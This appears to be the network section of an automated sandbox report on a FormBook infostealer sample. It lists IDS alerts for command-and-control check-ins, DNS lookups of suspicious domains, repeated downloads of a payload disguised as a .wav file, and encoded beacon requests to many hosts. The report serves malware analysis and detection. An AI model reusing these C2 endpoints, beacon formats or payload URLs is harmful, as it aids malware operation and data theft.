Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58078 -> 103.42.144.24:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58080 -> 103.42.144.24:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58088 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58086 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58090 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58092 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58110 -> 111.119.219.195:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58100 -> 134.122.135.54:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58105 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58104 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52487 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58085 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58075 -> 104.21.54.112:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58089 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52478 -> 157.112.187.77:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:52485 -> 8.222.228.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58094 -> 209.74.77.230:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58099 -> 134.122.135.54:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52479 -> 157.112.187.77:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58095 -> 209.74.77.230:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58079 -> 103.42.144.24:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58083 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58109 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58102 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58114 -> 172.67.148.163:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58093 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58107 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58096 -> 209.74.77.230:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58082 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52484 -> 8.222.228.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58103 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58081 -> 103.42.144.24:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58097 -> 209.74.77.230:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52488 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:52489 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52482 -> 8.222.228.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58108 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52480 -> 157.112.187.77:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52486 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58112 -> 111.119.219.195:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58117 -> 172.67.148.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58106 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:58101 -> 134.122.135.54:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:58091 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:52481 -> 157.112.187.77:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:52483 -> 8.222.228.107:80
                      Source: DNS query: www.lenzor.xyz
                      Source: DNS query: www.031233720.xyz
                      Source: DNS query: www.dualbitcoin.xyz
                      Source: DNS query: www.ethereumkeeper.xyz
                      Source: DNS query: www.moonavatar.xyz
                      Source: DNS query: www.blogkart4u.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: global trafficTCP traffic: 192.168.2.9:58070 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 8.222.228.107 8.222.228.107
                      Source: Joe Sandbox ViewIP Address: 157.112.187.77 157.112.187.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Rymwg.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /0pv3/?r2Q4K=X6iHrToHPpvPuDL&SxYDlTI=I6G8DBRKF3PN9Cy5HjggG2ycZCNyM0JG3kSPGuvbR5esC8dJu2EfwhpJJLd7FYxSNzCiq9OPGq3cAsVzLwaIQ6ylJ364WZTs0FaVS9XcmM1ou89sIg== HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ynw5/?SxYDlTI=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+l0CMldoMJ0m7ZXAsHIbwHSoXpSc05g==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pknc/?r2Q4K=X6iHrToHPpvPuDL&SxYDlTI=TsWT+PVJyweInpctzthQVdxTMr7Q3Mb2cuEH07dFoI07yBLnimF2DBYyoUH276N8oHesXX9azD5G5u0ynw8eWVvznNe+xiZhR1H5gqyKKaFxIDyX/g== HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hxn2/?SxYDlTI=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FE1FC2KR6ZjObRyGnHzUzw9P3InsxcQ==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qxo2/?SxYDlTI=o8DmqPI+VqVvnj/lu1ZpZtXdZr7bSrN2dVm8WOSQKn+kpW+rBJORjMlPia6OnGwbOFqdqYTBcx/hOJb3c+Na6fb6BqcWfXFzZMIQLYGCibvw2DUwkQ==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /shtf/?SxYDlTI=FhU37QPUjXoDR/mkORBYEbzjzv1Jdaom3Ft3Wddglnt/yj+EbctenxscC0kIxMOxkZk08U8HpLn+XILh76EKPRQYLSPadHv3H7HjHVpD4Cu6rC7cHg==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qkhv/?SxYDlTI=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaznVU8x6VfWmgC4v2krpA400j5pgNyuA==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /gu37/?SxYDlTI=iOl0XSH5CDMOf+V9HZ+UKaCE6FMs6uPW7cxb7UU6mqRal+VgoP4cf7GVxAN/lcjotRpWXcIGUQ8s/QpRPpBCk84lHlvoLiS5CPoEo/g3opO5cXnLfw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /36cg/?SxYDlTI=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqywahPdu8dbqHF6CFfcf9pvxXrPYJYw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /4w1v/?SxYDlTI=XpAG9fe2pLhJKmhZ85et2/QP5MtwFiP0J2u6NTgZVwSRoaiRiOX3KjlWgf7AqOqvMoNp5Q5VLCDsww+9yNorpihl81wEc1DKnMsuEV6CLBWysIWFlg==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hlq7/?SxYDlTI=dKN4O6z/N4DapGrcMOyrOAnbRVSrFobPG5RCVPQvSrMdLQWk1/Pc73VtQKyrUXqHVsljfksdfGpNujtuX/Zs4AXe6Whgc1+2+Qk0q5X0NORqkrazJw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ti21/?SxYDlTI=WGxoXqct8zJEPhtv7hvcADdTxPrqYVBaAgo9WLM116GuHzjz/IohiFqyzVfMSqM9DJaG8JlLLxRiginV+PkmpC/AwSD2S6jQ6R3uH2YrrVFlkkvWRg==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pzq1/?SxYDlTI=oDRqyMa6fuBuz7WmYIBwRJUpV6l9q4FTd5aLt2B5ybsFCSl98v1LZFy0dWfSbHe14Kep4ozyTwqi5TiZwq01Evz5suQx1WD3JzmH418CXViW0yuCBw==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /j64s/?SxYDlTI=EoY4h0UyAqkEWvzM9EA/7w4uqd0YPBtkD+z/1eOQyjkeiCosMlbYcdVAn/lmFNVY6HN81TLliXNwIu9yWC9x+RZjnwIkA71MomnPOqT//9nU4EDo/Q==&r2Q4K=X6iHrToHPpvPuDL HTTP/1.1Host: www.jingdongpt.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: www.crosspatches.info
                      Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                      Source: global trafficDNS traffic detected: DNS query: www.lenzor.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                      Source: global trafficDNS traffic detected: DNS query: www.031233720.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.lifce.life
                      Source: global trafficDNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
                      Source: global trafficDNS traffic detected: DNS query: www.ethereumkeeper.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.moonavatar.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.blogkart4u.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.xiongding.tech
                      Source: global trafficDNS traffic detected: DNS query: www.savposalore.shop
                      Source: global trafficDNS traffic detected: DNS query: www.splogi.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.knowesis.app
                      Source: global trafficDNS traffic detected: DNS query: www.jingdongpt.shop
                      Source: unknownHTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 196Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Data Raw: 53 78 59 44 6c 54 49 3d 55 48 58 7a 69 74 35 69 68 6d 6e 75 56 45 64 6d 57 71 6f 47 48 51 30 58 4d 6a 70 55 53 66 4d 72 48 50 71 38 77 43 7a 4e 49 56 78 43 52 74 66 75 36 55 33 36 51 76 59 65 6e 54 74 67 73 68 6f 4e 49 63 70 64 59 38 5a 56 51 4e 79 52 66 76 4c 2b 33 38 65 2f 6a 30 6d 39 70 74 46 78 59 52 62 57 66 6d 6f 36 44 50 61 4a 4c 48 6b 61 6b 46 77 49 6f 2f 78 50 75 57 47 7a 34 6f 33 6b 48 73 6f 64 65 6f 67 65 64 66 56 35 48 69 63 45 62 63 42 79 32 61 79 74 33 53 50 4a 36 49 7a 6d 57 58 4b 65 48 73 49 36 39 6d 51 2b 58 6f 71 68 48 51 51 65 58 65 30 31 69 36 4c 5a 78 2b 72 50 Data Ascii: SxYDlTI=UHXzit5ihmnuVEdmWqoGHQ0XMjpUSfMrHPq8wCzNIVxCRtfu6U36QvYenTtgshoNIcpdY8ZVQNyRfvL+38e/j0m9ptFxYRbWfmo6DPaJLHkakFwIo/xPuWGz4o3kHsodeogedfV5HicEbcBy2ayt3SPJ6IzmWXKeHsI69mQ+XoqhHQQeXe01i6LZx+rP
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:11:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
